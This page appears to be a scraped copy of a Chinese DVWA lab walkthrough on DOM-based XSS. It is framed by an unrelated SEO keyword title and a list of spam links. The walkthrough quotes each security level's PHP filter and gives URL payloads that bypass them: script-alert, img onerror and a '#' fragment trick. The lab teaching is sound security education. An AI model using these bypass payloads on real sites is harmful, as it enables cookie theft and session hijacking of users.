当前位置: 首页 > news >正文

福建泉州网站建设公司哪家好什么软件可以弄排名

福建泉州网站建设公司哪家好,什么软件可以弄排名,重庆市建筑协会信息网,百度经验网站建设DVWA DOM Based Cross Site Scripting (DOM型 XSS) 文章目录 DVWA DOM Based Cross Site Scripting (DOM型 XSS)XSS跨站原理DOM型 LowMediumHighImpossible XSS跨站原理 当应用程序发送给浏览器的页面中包含用户提交的数据,但没有经过适当验证或转义时,就…

DVWA DOM Based Cross Site Scripting (DOM型 XSS)

文章目录

  • DVWA DOM Based Cross Site Scripting (DOM型 XSS)
    • XSS跨站原理
      • DOM型
    • Low
    • Medium
    • High
    • Impossible

XSS跨站原理

当应用程序发送给浏览器的页面中包含用户提交的数据,但没有经过适当验证或转义时,就会导致跨站脚本漏洞。这个“跨”实际上属于浏览器的特性,而不是缺陷;

浏览器同源策略:只有发布Cookie的网站才能读取Cookie。

会造成Cookie窃取、劫持用户Web行为、结合CSRF进行针对性攻击等危害

DOM型

基于文档对象模型(Document Object Model)的一种漏洞;

DOM型与反射型类似,都需要攻击者诱使用户点击专门设计的URL;

Dom型 xss 是通过 url 传入参数去控制触发的;

Dom型返回页面源码中看不到输入的payload, 而是保存在浏览器的DOM中。

Low

1、分析网页源代码

<?php# No protections, anything goes?>
//没有任何防御措施

image-20240425141612735

2、修改default,在URL拼接Payload

<script>alert(/XSS/)</script>

image-20240425141658717

Medium

1、分析网页源代码

<?php// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {$default = $_GET['default'];# Do not allow script tagsif (stripos ($default, "<script") !== false) {header ("location: ?default=English");exit;}
}?>

增加对"<script"字符的过滤,查看前端代码

image-20240425143147799

2、构造闭合"option"和"select"标签,执行弹出"/xss/"的语句

</optin></select><img src = 1 onerror = alert(/xss/)>

image-20240616160139823

image-20240616161058852

High

1、分析网页源代码

<?php// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {# White list the allowable languagesswitch ($_GET['default']) {case "French":case "English":case "German":case "Spanish":# okbreak;default:header ("location: ?default=English");exit;}
}?>

2、在注入的 payload 中加入注释符 “#”,注释后边的内容不会发送到服务端,但是会被前端代码所执行。

(空格)#<script>alert(/xss/)</script>

image-20240616161314789

image-20240616161408461

Impossible

<?php# Don't need to do anything, protction handled on the client side?>
# 大多数情况下浏览器都会对 URL 中的内容进行编码,这会阻止任何注入的 JavaScript 被执行。
http://www.khdw.cn/news/7868.html

相关文章:

  • 网站首页置顶是怎么做产品推广方式有哪些
  • 咨询公司资质seo优化排名软件
  • 如何做采集网站百度竞价排名点击软件
  • 重庆网页设计培训seo工具软件
  • 用爬虫做数据整合网站网络推广引流
  • 做企业邮箱的网站出售外链
  • 有赞微商城登录北京seo招聘
  • 网站开发费 会计科目域名权重查询
  • 怎么找网站帮我做推广晋江友情链接是什么意思
  • 佛山做外贸网站平台电销系统
  • 渭南网站建设百度快速收录接口
  • 哈尔滨网站建设公司名字seo 资料包怎么获得
  • 工业设计网站官网推广免费
  • 可以在自己家做外卖的网站willfast优化工具下载
  • wap网站开发实例深圳市网络seo推广平台
  • asp.net做的小网站杭州seo外包服务
  • 网上学习网站有哪些西安网站建设排名
  • 有哪个理财网站是专门做汽车抵押的金泉网做网站多少钱
  • 网站建设合作签约报道百度快照的作用是什么
  • 恩施公司做网站长尾关键词排名工具
  • 包头网站建设公司百度搜索风云榜电视剧
  • 网站做百度推广要多少钱互联网营销师考试
  • 在线ps图百度seo推广方案
  • 怎么做企业营销型网站杭州线上推广
  • 网站上的验证码怎么做的seosem是什么职位
  • 常用的app开发制作手机优化大师
  • 网站建设定金合同范本短视频seo代理
  • 经开区网站建设唯尚广告联盟app下载
  • wordpress用户登录显示请求失败深圳seo优化外包
  • 阳春市住房规划建设局网站域名查询ip地址